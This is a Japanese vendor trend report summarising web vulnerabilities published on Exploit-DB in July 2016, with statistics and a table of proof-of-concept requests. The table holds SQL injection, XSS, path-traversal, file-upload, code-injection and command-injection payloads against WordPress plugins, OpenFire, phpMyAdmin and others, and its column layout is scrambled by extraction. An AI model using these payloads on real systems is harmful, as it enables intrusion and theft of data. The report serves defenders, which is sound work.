Untitled

2016.07
EDB-Report
最新Web脆弱性トレンドレポート(2016.07)
2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
サマリー
2016年7月に公開されたExploit-DBの分析結果、クロスサイトスクリプティング(Cross Site Scripting)攻撃に対する脆弱性の報告件数が最も多く、攻撃パターンも多様に発見されました。該当脆弱性は、一般
的に発生するクロスサイトスクリプティング(Cross Site Scripting)脆弱性ではなく、特定プログラム上でのみ発生する脆弱性がほとんどでした。主なソフトウェア別脆弱性発生の現況を見ると、Wordpressから最も多
い脆弱性が発見されました。(*Wordpressで発見された脆弱性は、Wordpress自体の問題ではなく、特定Plug-inを使う際に発生し得る脆弱性がほとんどです。)該当脆弱性は、ParameterのValueに挿入さ
れる形式であり、また特定なheaderを狙う脆弱性でした。脆弱性が発見されたプログラムやPlug-inを使用する管理者はアップデート事項の確認及び早急なアップデートが求められます。
1. 脆弱性別件数
脆弱性カテゴリ
16
件数
コマンド インジェクション
(Command Injection)
1
コード・インジェクション
(Code Injection)
1
ファイルアップロード
(File Upload)
1
ローカルファイル挿入
(Local File Inclusion:LFI)
3
危険度
早急対応要
高
合計
15
12
10
9
8
6
4
SQL インジェクション
(SQL Injection)
クロスサイトスクリプティング
(Cross Site Scripting :
XSS)
合計
2.危険度別分類
脆弱性別件数
14
9
3
2
1
1
1
0
15
30
危険度別分類
件数
2
28
30
割合
6.67%
93.33%
2
100.00%
早急対応要
高
28
3. 攻撃実行の難易度別件数
難易度
難
中
易
合計
件数
2
7
21
30
割合
6.67%
23.33%
70.00%
攻撃実行の難易度別件数
2
100.00%
難
7
中
易
21
4. 主なソフトウェア別脆弱性発生件数
ソフトウェア名
Wordpress
OpenFire
AWBS
Ktools
eCardMAX
IPS Community Suite
CodoForum
Tiki Wiki
PaKnPost
Django
PhpMyAdmin
PHP File Vault
Joomla
php Real Estate Script
Streamo
合計
件数
5
5
5
3
2
1
1
1
1
1
1
1
1
1
1
30
主なソフトウェア別脆弱性発生件数
Wordpress
1
1
1
OpenFire
5
AWBS
1
Ktools
1
eCardMAX
1
IPS Community Suite
1
1
5
1
CodoForum
Tiki Wiki
PaKnPost
1
Django
PhpMyAdmin
2
3
5
PHP File Vault
Joomla
php Real Estate Script
EDB-Report
最新Web脆弱性トレンドレポート(2016.07)
2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
脆弱性名
攻撃コード
対象プログラム
対象環境
2016-07-04
40058
SQL Injection
易
高
eCardMAX 10.5 - index.php
SQL Injection 脆弱性
/ecardmaxdemo/admin/index.php?step=admin_sho
w_keyword&what=&row_number=10%20order%2
0by%201--&search_year=2016&page=2
eCardMAX
eCardMAX
10.5
2016-07-06
40062
SQL Injection
中
高
Advanced Webhost Billing
System (AWBS) 2.9.6 aomanage.php SQL Injection 脆
弱性
/admin/aomanage.php?search=1&cat=status%20U
NION%20select%201,2,3,version%28%29,5,curre
nt_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2
1--&list=3&so=status'
AWBS
Advanced
Webhost
Billing System
(AWBS) 2.9.
Ktools
Ktools
Photostore
4.7.5
eCardMAX
eCardMAX
10.5
2016-07-04
40051
SQL Injection
難
早急対応要
Ktools Photostore 4.7.5 /photostore/gallery/Objects/24/
page1/ SQL Injection 脆弱性
POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
postGalleryForm=1&gallerySortBy=media_id&gallery
SortType=asc,(SELECT 9713 FROM(SELECT
COUNT(*),CONCAT(0x71716b6b71,(SELECT
(ELT(9713=9713,1))),0x7178717171,FLOOR(RAND
(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)
/ecardmaxdemo/admin/index.php?step=admin_me
mber_display&search_field=all&keyword=%3Cscript
%3Ealert(1)%3C%2Fscript%3E&cmd_button=Sear
ch+User
2016-07-04
40058
XSS
易
高
eCardMAX 10.5 - index.php
XSS 脆弱性
2016-07-04
40051
XSS
易
高
Ktools Photostore 4.7.5 workbox.php XSS 脆弱性
/photostore/workbox.php?mode=addToLightbox&
mediaID=“><script>alert(/XSS/)</script>
Ktools
Ktools
Photostore
4.7.5
2016-07-04
40051
XSS
易
高
Ktools Photostore 4.7.5 mgr.login.php XSS 脆弱性
/photostore/manager/mgr.login.php?username=de
mo&password='><script>alert("XSS")</script><input
type='hidden
Ktools
Ktools
Photostore
4.7.5
2016-07-06
40062
SQL Injection
中
高
Advanced Webhost Billing
System (AWBS) 2.9.6 /admin/hostingarchiveadmin.php?search=1&cat=sta
hostingarchiveadmin.php SQL tus UNION select 1--&list=1&so=status'
Injection 脆弱性 #
AWBS
Advanced
Webhost
Billing System
(AWBS) 2.9.
EDB-Report
最新Web脆弱性トレンドレポート(2016.07)
2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-07-06
EDB番号
40063
脆弱性カテゴリ
File Upload
攻撃難脆弱性度
易
危険度
高
脆弱性名
攻撃コード
POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/
HTTP/1.1
Host:
Connection: CloseAccept: text/html,
application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.2; WOW64; Trident/6.0)
PaKnPost Pro 1.14 - select_.cgi Content-Type: multipart/form-data; boundary=------File Upload 脆弱性
--------------------7dd10029908f2
対象プログラム
対象環境
PaKnPost
PaKnPost Pro
1.14
AWBS
Advanced
Webhost
Billing System
(AWBS) 2.9.
AWBS
Advanced
Webhost
Billing System
(AWBS) 2.9.
AWBS
Advanced
Webhost
Billing System
(AWBS) 2.9.
OpenFire
OpenFire
3.10.2 < 4.0.1
OpenFire
OpenFire
3.10.2 < 4.0.1
OpenFire
OpenFire
3.10.2 < 4.0.1
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="file";
filename="pnp-test.txt.cgi"
Content-Type: application/octet-stream
-----------------------------7dd10029908f2--
2016-07-06
40062
XSS
中
高
Advanced Webhost Billing
System (AWBS) 2.9.6 cmanage.php XSS 脆弱性
POST /admin/cmanage.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
reason=%22%3E%3Cscript%3Ealert%281%29%
3C%2Fscript%3E
2016-07-06
40062
XSS
中
高
Advanced Webhost Billing
System (AWBS) 2.9.6 helpdesk.php XSS 脆弱性
POST /admin/helpdesk.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
hd_name="><script>alert(1)</script>
2016-07-06
2016-07-06
40062
40065
XSS
XSS
中
易
高
高
Advanced Webhost Billing
System (AWBS) 2.9.6 omanage.php XSS 脆弱性
OpenFire 3.10.2 - 4.0.1 server2server-settings.jsp XSS
脆弱性
/omanage.php?search=1%22%3E%3Cscript%3Eal
ert%283%29%3C/script%3E&cat=status%22%3E
%3Cscript%3Ealert%284%29%3C/script%3E&list
=4%22%3E%3Cscript%3Ealert%282%29%3C/scr
ipt%3E&so=status%22%3E%3Cscript%3Ealert%2
81%29%3C/script%3E
POST /server2server-settings.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
domain=%22%2F%3E%3Cscript%3Ealert%28%2
7XSS%27%29%3C%2Fscript%3E&remotePort=52
69&serverAllowed=Add+Server
2016-07-06
2016-07-06
40065
40065
XSS
XSS
易
易
高
高
/plugins/search/advance-userOpenFire 3.10.2 - 4.0.1 search.jsp?search=true&moreOptions=false&criteria
advance-user-search.jsp XSS 脆
=admin%22/%3E%3Cscript%3Ealert%28%27XSS
弱性
%27%29%3C/script%3E&search=Search
POST /muc-service-edit-form.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
OpenFire 3.10.2 - 4.0.1 - muc- Accept: */*
service-edit-form.jsp XSS 脆弱性 Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
save=true&mucname=test&mucdesc=test%22%2F
%3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E
EDB-Report
最新Web脆弱性トレンドレポート(2016.07)
2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-07-06
EDB番号
40065
脆弱性カテゴリ
XSS
攻撃難脆弱性度
易
危険度
高
脆弱性名
攻撃コード
POST /plugins/search/search-props-edit-form.jsp
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
OpenFire 3.10.2 - 4.0.1 Chrome/16.0.912.75 Safari/535.7
search-props-edit-form.jsp XSS Accept: */*
脆弱性
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
対象プログラム
対象環境
OpenFire
OpenFire
3.10.2 < 4.0.1
OpenFire
OpenFire
3.10.2 < 4.0.1
Wordpress
WordPress
Real3D
FlipBook
Plugin
Streamo
Streamo
Online Radio
And TV
Streaming
CM
php Real Estate
Script
php Real
Estate Script 3
searchEnabled=true&searchname=%22/%3E%3Cs
cript%3Ealert('XSS')%3C/script%3E&groupOnly=fa
lse
2016-07-06
2016-07-04
40065
40055
XSS
XSS
易
易
高
高
/groupOpenFire 3.10.2 - 4.0.1 summary.jsp?search=test%22+onmouseover%3Dal
group-summary.jsp XSS 脆弱性
ert%28%27XSS%27%29+x%3D%22
POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
WordPress Real3D FlipBook
Chrome/16.0.912.75 Safari/535.7
Plugin - flipbooks.php XSS 脆弱
Accept: */*
性
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
action=delete&bookId=<script>alert(/makman/)</scr
ipt>
2016-07-08
2016-07-08
40078
40076
SQL Injection
LFI
難
易
高
高
/programs.php?id=999999.9%27%20union%20all
%20select%20concat%280x7e%2C0x27%2Cunhe
Streamo Online Radio And TV
x%28Hex%28cast%28database%28%29%20as%
Streaming CMS - programs.php
20char%29%29%29%2C0x27%2C0x7e%29%2C
SQL Injection 脆弱性
0x31303235343830303536%20and%20%27x%2
7%3D%27x
POST /admin/ajax_cms/get_template_content/
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
php Real Estate Script 3 AppleWebKit/535.7 KHTML, like Gecko
/admin/ajax_cms/get_template Chrome/16.0.912.75 Safari/535.7
_content/ LFI 脆弱性
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
tpl=../../private/config/db.php
2016-07-11
40082
XSS
易
高
GET / HTTP/1.1
WordPress All in One SEO Pack Plugin
Host: 2.3.6.1 - / XSS 脆弱性
WordPress All
Wordpress
User-Agent: Abonti </pre><script>alert(1);</script>
2016-07-11
40080
LFI
易
高
2016-07-11
40084
Code Injection
易
高
Tiki Wiki CMS 15.0 flv_stream.php LFI 脆弱性
/player/flv/flv_stream.php?file=../../../db/local.php&
position=0
Tiki Wiki
in One SEO
Pack Plugin
2.3.6.1
Tiki Wiki CMS
15.0
/index.php?app=core&module=system&controller=
IPS
IPS Community Suite 4.1.12.3 - index.php
Code Injection 脆弱性
IPS Community Suite Community
content&do=find&content_class=cms\Fields1{}phpi
nfo();/*
Suite 4.1.12.3
EDB-Report
最新Web脆弱性トレンドレポート(2016.07)
2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
脆弱性名
攻撃コード
対象プログラム
対象環境
POST /wp-login.php HTTP/1.1
Host:
2016-07-11
40083
XSS
易
高
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
WordPress Activity Log Plugin 2.3.1 - wp-login.php XSS 脆弱性
charset=UTF-8
X-Forwarded-For:
WordPress
WordPress
Activity Log
Plugin 2.3.1
<script>alert(document.cookie);</script>
log=wordpress&pwd=sdsdssdsdsd&wpsubmit=Log+In&redirect_to=http%3A%2F%2F192.16
8.28.135%2Fwp-admin%2F&testcookie=1
2016-07-14
40111
SQL Injection
易
高
Joomla Guru Pro (com_guru)
Component - index.php SQL
Injection 脆弱性
/index.php?option=com_guru&view=gurupcategs&l
ayout=view&Itemid=1%20and%201=1--&lang=en
Joomla
Joomla Guru
Pro
(com_guru)
Component
POST /wp-admin/adminajax.php?action=spiderVeideoPlayerselectplaylist
HTTP/1.1
Host:
2016-07-20
40137
SQL Injection
中
高
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
WordPress Video Player Plugin 1.5.16
- SQL Injection
Content-Type:
application/x-www-form-urlencoded;
WordPress
Wordpress
charset=UTF-8
Video Player
Plugin 1.5.1
search_events_by_title=&page_number=0serch_or_n
ot=&asc_or_desc=1&order_by=(CASE WHEN
(SELECT sleep(10)) = 1 THEN id ELSE title END) ASC
#&option=com_Spider_Video_Player&task=select_pl
aylist&boxchecked=0&filter_order_playlist=&filter_or
der_Dir_playlist=
POST /index.php HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2
2016-07-20
40129
XSS
易
高
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="to_field"
Django CMS 3.3.0 /en/admin/djangocms_snippet/ id
snippet/2/ XSS 脆弱性
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="name"
Django
Django CMS
3.3.0
CodoForum
CodoForum
3.2.1
PHP File Vault
PHP File Vault
0.9
test <img src="x">%20%20>"<iframe
src="a">%20<iframe> "><"<img
src="x">%20%20>"<iframe
src=a><script>alet(1);</script><iframe>
-----------------------------7dd10029908f2--
2016-07-25
40150
SQL Injection
中
高
/forum/index.php?u=/user/profile/1%20AND%20(
SELECT%202*(IF((SELECT%20*%20FROM%20(SE
CodoForum 3.2.1 - index.php LECT%20CONCAT((MID((IFNULL(CAST(CURRENT_U
SQL Injection 脆弱性
SER()%20AS%20CHAR),0x20)),1,451))))s),%2084
46744073709551610,%20844674407370955161
0)))
2016-07-26
40163
LFI
易
高
PHP File Vault 0.9 /htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F.
/htdocs/fileinfo.php LFI 脆弱性 .%2F..%2Fetc%2Fpasswd
EDB-Report
最新Web脆弱性トレンドレポート(2016.07)
2016.07.01~2016.07.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-07-29
EDB番号
40174
脆弱性カテゴリ
SQL Injection
攻撃難脆弱性度
易
危険度
高
脆弱性名
攻撃コード
POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
Wordpress Ultimate Product AppleWebKit/535.7 KHTML, like Gecko
Catalog 3.9.8 - (do_shortcode Chrome/16.0.912.75 Safari/535.7
via ajax) Blind SQL Injection Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
対象プログラム
対象環境
Wordpress
Wordpress
Ultimate
Product
Catalog 3.9.8
id=1+OR+SLEEP(10)+--+
POST /tbl_find_replace.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
2016-07-29
40185
Command Injection
易
早急対応要
Chrome/16.0.912.75 Safari/535.7
PhpMyAdmin 4.6.2 - tbl_find_replace.php Command Injection 脆弱性
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
replaceWith=system('uname -a');
PhpMyAdmin
PhpMyAdmin
4.6.2